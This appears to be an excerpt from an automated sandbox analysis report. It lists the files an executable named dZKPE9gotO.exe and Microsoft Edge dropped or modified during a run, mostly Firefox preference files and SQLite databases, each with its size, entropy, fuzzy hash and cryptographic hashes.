                                                                                                                                                                                                                                                Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "27fb6245-bd08-4de6-8f4d-2ece3f597752");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696491690);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696491694);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                Entropy (8bit):4.694574194309462
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:57msLju1di6quBsK4eI3+RkAjyMKtB/kS0G1:gmjuC1uBsNeAokAUB/GE
                                                                                                                                                                                                                                                MD5:78801AF1375CDD81ED0CC275FE562870
                                                                                                                                                                                                                                                SHA1:8ED80B60849A4665F11E20DE225B9ACB1F88D5A9
                                                                                                                                                                                                                                                SHA-256:44BF2D71E854D09660542648F4B41BC00C70ABA36B4C8FD76F9A8D8AB23B5276
                                                                                                                                                                                                                                                SHA-512:E20D16EC40FEF1A83DB1FC39A84B691870C30590FC70CA38CC83A8F08C08F626E3136ADBF3B731F85E5768561C8829C42DF3B97C726191FEF3859272A03E99E0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                Entropy (8bit):4.691266297898928
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
                                                                                                                                                                                                                                                MD5:7D4E714F4EDA4631DCA8D420338392F1
                                                                                                                                                                                                                                                SHA1:536B4BCBAB5C780738EE2D562D16AB532C9D8E68
                                                                                                                                                                                                                                                SHA-256:841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
                                                                                                                                                                                                                                                SHA-512:FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):51200
                                                                                                                                                                                                                                                Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                                MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                                SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                                SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                                SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                Entropy (8bit):4.694574194309462
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:57msLju1di6quBsK4eI3+RkAjyMKtB/kS0G1:gmjuC1uBsNeAokAUB/GE
                                                                                                                                                                                                                                                MD5:78801AF1375CDD81ED0CC275FE562870
                                                                                                                                                                                                                                                SHA1:8ED80B60849A4665F11E20DE225B9ACB1F88D5A9
                                                                                                                                                                                                                                                SHA-256:44BF2D71E854D09660542648F4B41BC00C70ABA36B4C8FD76F9A8D8AB23B5276
                                                                                                                                                                                                                                                SHA-512:E20D16EC40FEF1A83DB1FC39A84B691870C30590FC70CA38CC83A8F08C08F626E3136ADBF3B731F85E5768561C8829C42DF3B97C726191FEF3859272A03E99E0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                Entropy (8bit):4.691179545447335
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:tlYQ6oxCx5XYY3KvUEOIA65F7dAeIQGhrMerXo:rxy5avIgDIQQrMQXo
                                                                                                                                                                                                                                                MD5:70ED9F89ADEE0C43C2C82F30F075991E
                                                                                                                                                                                                                                                SHA1:0E75067F3EEBF7D577813A06A0A6A2FA9640A04F
                                                                                                                                                                                                                                                SHA-256:4CCB14AF416B302962BC020D9E436FCA0B32B56F37932B2CA7D078355282CF80
                                                                                                                                                                                                                                                SHA-512:A75A2B3BE722735CE45B93CB1522F31D884BA8BE30A122BFCE7E50720773B0B5B48F163BB9FF0239015430BEADD61DAD76F13EA6CC027C5A4AB4B842EED468CB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):159744
                                                                                                                                                                                                                                                Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                                MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                                SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                                SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                                SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                Entropy (8bit):4.698999446679606
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:W9l1TKf/7G6pHxojyPqnhSz0hujim56BAhI8QR9QlFpd:6l1uFqyP5zY5moAoah
                                                                                                                                                                                                                                                MD5:73351F70BFEF33BEEA9E1CC192801D02
                                                                                                                                                                                                                                                SHA1:ACFD9C2DFA1B38FAB53EEB4730B0DF0551B45D8C
                                                                                                                                                                                                                                                SHA-256:F6917A805A90AC72064D294E5E0FBA4604588F7B0EB2B3A3511D1FC6887E3E24
                                                                                                                                                                                                                                                SHA-512:56D46FF29F86F3B314EBC6CC456A1D153D0F1245A926F82AE7FA9A6A5AD792094FEDBB5FC489929186C8A72732BE4EAFF3BCF2E508B8B2FC50B013E6166B212C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                Entropy (8bit):4.701796197804446
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:C1U2g6pCwYBq9+pGzEcrz023TZ9iFxwELi:2U2gCCm9drz0wTZsIEe
                                                                                                                                                                                                                                                MD5:C8350CE91F4E8E8B04269B5F3C6148DA
                                                                                                                                                                                                                                                SHA1:22D523A327EBAF8616488087E2DCE9DBD857F0CC
                                                                                                                                                                                                                                                SHA-256:1BE0B3682C4F3A3315465E66A2C7C357BB06225947C526B1B89A39D9D120AFBF
                                                                                                                                                                                                                                                SHA-512:C4891D35B6E895E4A9F4A785701EFFA4305AE88D09D309865F9312D95C296CB417916D8CBA461099E80F68C5AE5015A1172E60319256A453DE81445660F55806
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):196608
                                                                                                                                                                                                                                                Entropy (8bit):1.265218452828871
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:KrJ/2qOB1nxCkMCSAELyKOMq+8HKkjucswRv8p3nVumH:K0q+n0JC9ELyKOMq+8HKkjuczRv89D
                                                                                                                                                                                                                                                MD5:7C249851A2911B3A022EAC881865A7B5
                                                                                                                                                                                                                                                SHA1:CAF47563F78974C64F0F7265F3647C199B1AD8A5
                                                                                                                                                                                                                                                SHA-256:77B59D9F995AC8D2674E3CF9799A069AB6DBFEA8AD431D06CF1820946F0C767D
                                                                                                                                                                                                                                                SHA-512:DD78A3338802BEB75F4AABC0F216612E03E69C29C0FB1A7E69AF1C7ACBB7DA50E81BFDF4B3A5967D5A7536BFC95665CEDB633ECF2E2E3BB27CBE9BBDDD2FCFDB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):294912
                                                                                                                                                                                                                                                Entropy (8bit):0.08441928760034874
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vI:51zkVmvQhyn+Zoz67V
                                                                                                                                                                                                                                                MD5:2ABDC5DBC05C0C5CE5E1EB6D6E8C1B0D
                                                                                                                                                                                                                                                SHA1:14DFBE9B28D033542357D98005239D842A16FCFD
                                                                                                                                                                                                                                                SHA-256:91F1008439BD28B09EC1FC851F2679DFBAA45B27409882AD899CEF8460A036AF
                                                                                                                                                                                                                                                SHA-512:DD4BD1407DFDC90BC97F5940A120CCDE7D4A6DAA3E0DB1649BED96EBE52FFDF879E52E028657F954FF39A93EEE8F57694A7EAC55D85CA57AF2BBD7A7793B9030
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):40960
                                                                                                                                                                                                                                                Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                Entropy (8bit):4.698999446679606
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:W9l1TKf/7G6pHxojyPqnhSz0hujim56BAhI8QR9QlFpd:6l1uFqyP5zY5moAoah
                                                                                                                                                                                                                                                MD5:73351F70BFEF33BEEA9E1CC192801D02
                                                                                                                                                                                                                                                SHA1:ACFD9C2DFA1B38FAB53EEB4730B0DF0551B45D8C
                                                                                                                                                                                                                                                SHA-256:F6917A805A90AC72064D294E5E0FBA4604588F7B0EB2B3A3511D1FC6887E3E24
                                                                                                                                                                                                                                                SHA-512:56D46FF29F86F3B314EBC6CC456A1D153D0F1245A926F82AE7FA9A6A5AD792094FEDBB5FC489929186C8A72732BE4EAFF3BCF2E508B8B2FC50B013E6166B212C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):98304
                                                                                                                                                                                                                                                Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):155648
                                                                                                                                                                                                                                                Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                                MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                                SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                                SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                                SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):106496
                                                                                                                                                                                                                                                Entropy (8bit):1.137181696973627
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cR/k4:MnlyfnGtxnfVuSVumEHRM4
                                                                                                                                                                                                                                                MD5:2D903A087A0C793BDB82F6426B1E8EFB
                                                                                                                                                                                                                                                SHA1:E7872CC094C598B104DA25AC6C8BEB82DAB3F08F
                                                                                                                                                                                                                                                SHA-256:AD67ADF2D572EF49DC95FD1A879F3AD3E0F4103DD563E713C466A1F02D57ED9A
                                                                                                                                                                                                                                                SHA-512:90080A361F04158C4E1CCBB3DE653FFF742C29A49523B6143B0047930FC34DC0F1D043D3C1B2B759933E1685A4CB382FD9E41B7ACDD362A2217C3810AEF95E65
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                Entropy (8bit):4.694574194309462
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:57msLju1di6quBsK4eI3+RkAjyMKtB/kS0G1:gmjuC1uBsNeAokAUB/GE
                                                                                                                                                                                                                                                MD5:78801AF1375CDD81ED0CC275FE562870
                                                                                                                                                                                                                                                SHA1:8ED80B60849A4665F11E20DE225B9ACB1F88D5A9
                                                                                                                                                                                                                                                SHA-256:44BF2D71E854D09660542648F4B41BC00C70ABA36B4C8FD76F9A8D8AB23B5276
                                                                                                                                                                                                                                                SHA-512:E20D16EC40FEF1A83DB1FC39A84B691870C30590FC70CA38CC83A8F08C08F626E3136ADBF3B731F85E5768561C8829C42DF3B97C726191FEF3859272A03E99E0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\dZKPE9gotO.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                                Entropy (8bit):4.691266297898928
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:VFl0HyrVqOHKWeRhsGhMtSCTPacJ7pZeZLF8M7y+b:VFl0HyrVqOqNRhHkTaW73Q58yy+b
                                                                                                                                                                                                                                                MD5:7D4E714F4EDA4631DCA8D420338392F1
                                                                                                                                                                                                                                                SHA1:536B4BCBAB5C780738EE2D562D16AB532C9D8E68
                                                                                                                                                                                                                                                SHA-256:841F74A72A1D21F63E4039906E93A4FD9E70EC517385DDEE855033A9A17FE94A
                                                                                                                                                                                                                                                SHA-512:FEB2EEC88720FF040794CD273A7B4A07DD5AC1E6CD9A9235A098F1FB3A1C50385B37E376764C927978961A0EE4AC1C591F197494D82D71B35EAA3780956CB1A3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                Size (bytes):44719
                                                                                                                                                                                                                                                Entropy (8bit):6.0947557576497475
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kt9KKGf4oD0IUFWtIPN7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynpN7VLyMV/YoskFoz
                                                                                                                                                                                                                                                MD5:F3A64342532823E00D591D512BDFAC72
                                                                                                                                                                                                                                                SHA1:8F80A5D88718C677B8720C5E566A0C6B9B7A1B33
                                                                                                                                                                                                                                                SHA-256:308EFBE1D33372B4C9BBA1FF56CED2AC5D4A8CEC1649420105F0FD83BDC1361C
                                                                                                                                                                                                                                                SHA-512:5D16C3C975ABF54A95AAC9481DAF30BEF5A6E8D45FF84F6811F82706DC86721DF791527ED8F9D9400737A975EA917F85B73202D78337BD2542291F846EB6D54C
                                                                                                                                                                                                                                                Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):44719
                                                                                                                                                                                                                                                Entropy (8bit):6.0947557576497475
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kt9KKGf4oD0IUFWtIPN7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7ynpN7VLyMV/YoskFoz
                                                                                                                                                                                                                                                MD5:F3A64342532823E00D591D512BDFAC72
                                                                                                                                                                                                                                                SHA1:8F80A5D88718C677B8720C5E566A0C6B9B7A1B33
                                                                                                                                                                                                                                                SHA-256:308EFBE1D33372B4C9BBA1FF56CED2AC5D4A8CEC1649420105F0FD83BDC1361C
                                                                                                                                                                                                                                                SHA-512:5D16C3C975ABF54A95AAC9481DAF30BEF5A6E8D45FF84F6811F82706DC86721DF791527ED8F9D9400737A975EA917F85B73202D78337BD2542291F846EB6D54C
                                                                                                                                                                                                                                                Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):44797
                                                                                                                                                                                                                                                Entropy (8bit):6.095239141032858
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xt9KKGf4oBauetCPjN7DRo+yM/42cRaLMoskCioz:z/Ps+wsI7yOAN7VLyMV/YoskFoz
                                                                                                                                                                                                                                                MD5:389A24370C86D5CB53BE24B94052BA65
                                                                                                                                                                                                                                                SHA1:2EA921B8A000B8A7D434068D3080391252A788DE
                                                                                                                                                                                                                                                SHA-256:185E200F78AAD00265A3C6E936E4166B82A30F0C7D732C4B893F7F23488182A9
                                                                                                                                                                                                                                                SHA-512:5A1085B2308FBF8A43393DC16CB2052B892A3FCA6B7DD19103ED639EEC4090C16B47775BA8A6C8731E939279C50FAA258BBBB0BF7A9F1A1F996AF1E24BBB769D
                                                                                                                                                                                                                                                Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):107893
                                                                                                                                                                                                                                                Entropy (8bit):4.64013246649014
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P78:fwUQC5VwBIiElEd2K57P78
                                                                                                                                                                                                                                                MD5:10101225085294C4AA9050CEF19E599D
                                                                                                                                                                                                                                                SHA1:D1E683B46B7E0B1C4DE538392F7ACB4DF6280404
                                                                                                                                                                                                                                                SHA-256:6F703C25109774C2D844787790FFA45183787FBFA140A5AEAD247638E0987C21
                                                                                                                                                                                                                                                SHA-512:A8C5867A96AD36813905AD2C01D5C18CBB82D3F1F91DFCE64E48D60EED226F1F16DBD5F3B8FC9DF065D0C641A3245EC6E59556EE4B2C219852B0C43584D334F4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):107893
                                                                                                                                                                                                                                                Entropy (8bit):4.64013246649014
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P78:fwUQC5VwBIiElEd2K57P78
                                                                                                                                                                                                                                                MD5:10101225085294C4AA9050CEF19E599D
                                                                                                                                                                                                                                                SHA1:D1E683B46B7E0B1C4DE538392F7ACB4DF6280404
                                                                                                                                                                                                                                                SHA-256:6F703C25109774C2D844787790FFA45183787FBFA140A5AEAD247638E0987C21
                                                                                                                                                                                                                                                SHA-512:A8C5867A96AD36813905AD2C01D5C18CBB82D3F1F91DFCE64E48D60EED226F1F16DBD5F3B8FC9DF065D0C641A3245EC6E59556EE4B2C219852B0C43584D334F4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3::
                                                                                                                                                                                                                                                MD5:B5CFA9D6C8FEBD618F91AC2843D50A1C
                                                                                                                                                                                                                                                SHA1:2BCCBD2F38F15C13EB7D5A89FD9D85F595E23BC3
                                                                                                                                                                                                                                                SHA-256:BB9F8DF61474D25E71FA00722318CD387396CA1736605E1248821CC0DE3D3AF8
                                                                                                                                                                                                                                                SHA-512:BD273BF4E10ED6E305ECB7B781CB065545FCE9BE9F1E2968DF22C3A98F82D719855AAFE5FF303D14EA623A5C55E51E924E10033A92A7A6B07725D7E9692B74F5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                Entropy (8bit):0.047640353993796986
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:2ub0m5tmfnOAUJYVJy7qiRDs0JVFg8XY6I/hEHsBzhEhNGMv+RQ8TfWGYR0n8y0d:Tb0UtQXa6Pnhcxmv7m008T2RGOD
                                                                                                                                                                                                                                                MD5:32C98C77A74F7E6796A78E7D915AFB78
                                                                                                                                                                                                                                                SHA1:5FF167D47E37762DA04AFF796ADA60D896F65728
                                                                                                                                                                                                                                                SHA-256:54B574FA84D7E9037158EBBB65E04631388D8F48A945034D58C2045CE1E3D728
                                                                                                                                                                                                                                                SHA-512:07746DE1CB6C95855B712B9EF088EFC8C50C5370D4A2486BB9F9A5E753F1F6470E0466AE72BC5FBCC21B48F79AAF1C2D86D183BAA191F771A2914D4A5B00C71E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4194304
                                                                                                                                                                                                                                                Entropy (8bit):0.4995815634055697
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3072:QTLbnORjN0WVZiIYdFIPkcopAQJx5DSUFSEsJSgzqxxDKtSg1HFwI2D:wbn2lYdFqkcozPBFSPSgzq3KtSaHC
